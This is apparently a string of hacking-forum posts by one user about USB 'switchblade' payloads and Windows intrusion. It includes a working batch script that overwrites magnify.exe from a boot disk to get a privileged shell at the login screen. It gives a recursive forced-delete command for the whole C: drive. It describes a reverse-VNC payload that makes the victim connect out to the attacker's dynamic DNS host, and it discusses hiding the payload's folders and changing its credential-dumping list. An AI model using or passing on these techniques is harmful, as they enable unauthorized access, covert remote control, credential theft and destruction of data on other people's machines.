Joerg

I recommend you to try the reverse vnc. Otherwise you have to hack every router to get vnc ;)

Ehm, if you try this you'll get some nice errors ;) I'm booting from a dos floppy so I don't have systemvariables If it would be so easy, I would have done this. A problem I spotted is, if someone has more than just 1 windows nt system installed, that the script just copies it once.

Yes, your script works for all standard xp/vista machines. My script works for all 2000/xp/vista systems installed on another partition then C: For me it is more important to make the script work on any pc (running windows)

Yeah, i love posting nonsense ;) I meant that windows didn't replaced the patched files after a forced reboot, but i think it's because i deactivated the sfc on my vm, so never mind and ignore this and my last post

i suggest unerasing the important files before installing something new

Why not make a batch using the "del" command?

? Do you mean that government computers are using windows 9x with extenions (sounds weird) or a nt system?

Sparda, i did this so often in a vm ;) it should be del /f /s /q /a C:*

Maybe a skiddie "attack" It's very easy to delete the whole system via batch -- If there are important files you can try to unerase them

Virus?

By th way, I tested the system file protection of windows xp. I replaced the files and hit reset on my virtual machine. After that, the files were still there (replaced). Can someone confirm this?

My idea is to first set up a reverse shell, then call via the shell a batch which starts the vnc proces with parameters. -> You only have vnc if you really need it // With my switchblade i had the issue that every 15 min a vnc window appeared and that was bad

Changing internal ip adress?

i used ntfs4dos but i'm sure there are better solutions You format the disc using the ntfs4dos prog and copy the files of bootdisc.zip onto the disc. // note to myself: read

// I'm running a password stripper with the -tabledance option, that's nice! Check the wiki for further information

Nope, because the cd laser emits infrared rays. You still could get blinded, but you wouldn't see the beam.

Ehm, i actually did that some time ago ;) @echo on FOR %i IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO IF EXIST %i:ntldr SET SYS=%i FOR %a IN (windows winnt) DO IF EXIST %sys%:%asystem32winlogon.exe SET WIN=%a copy ".magnify.exe" "%SYS%:%win%system32dllcachemagnify.exe" /Y copy ".magnify.exe" "%SYS%:%win%system32magnify.exe" /Y This does work on 2k and on xp And i set up a bootdisc with ntfs4dos, look here

And of course, there are open access points at every corner.

To avoid the "port forwarding issue" I modified my payload so the victim connects to my pc. So you only have to make a forwarding at your router which is very useful. Quick'n dirty howto: 1. Get a dyndns account to provide the current ip adress 2. Write some code to let the vnc.exe connect to your static hostname 3. Get the vncviewer and run it in the listener mode If you'd like I can provide the code.

Usually you can route the error messages at /dev/null via the 2>nul appendix command 2>nul

@kickarse: the magnify.exe is a system file, so replacing is only possible by an administrator (or a person having admin rights) or by booting from another os. But it can be started by everyone. The difficult part is, that you need admin rights instantly and not the dirty way by booting another operating system. EDIT: http://oxid.netsons.org/phpBB2/viewtopic.php?p=4578 To make a long story short, you create a service which calls the cmd.exe with SYSTEM rights. To prove that you have system rights, you can change into the system volume information folder. But as alway, you need admin rights.

The idea itself is not new, but the use could be it ;) If you're using the standard switchblade and would like to change some pathes (e.g. installation path, cmd-path, ...) you would have to edit nearly your whole batch. One solution would be using variables specified in each batch, but that still means to change a handful batches. The solution, a simple txt-file containing the data. The file "locations.ini" containing the pathes ... cmd=the.folder.without.variable dmp=dump ... and a line of code in every batch file which sets the variables for /f %%i IN (.locations.ini) do set %%i An example: .%cmd%iepv.exe --> .the.folder.without.variableiepv.exe So without editing a normal or compiled batch pathes can be changed without great effort. This could be useful for: - changing the active components of the switchblade without editing or compiling a batch - changing the foldernames created on the pc in order to be more "invisible" - changing the "runlist" of programs to dump informations ...

It seems that Tor servers are still blocked ERROR : Closing link (xxxxx@ERR.CYLAB.CMU.EDU) [G-Lined: Your IP, xxx.xxx.xxx.xxx, is in our TOR Server List]

I did set up a bootdisk with ntfs4dos to copy a compiled batch into the system32 folder (magnify.exe). By pressing {Win}+{U} and starting the magnifier you have a administrator account. This does not require administrator rights, but needs physical access.

The problem with truecrypt is, that you need the driver installed on the system if you're not an admin to work with it.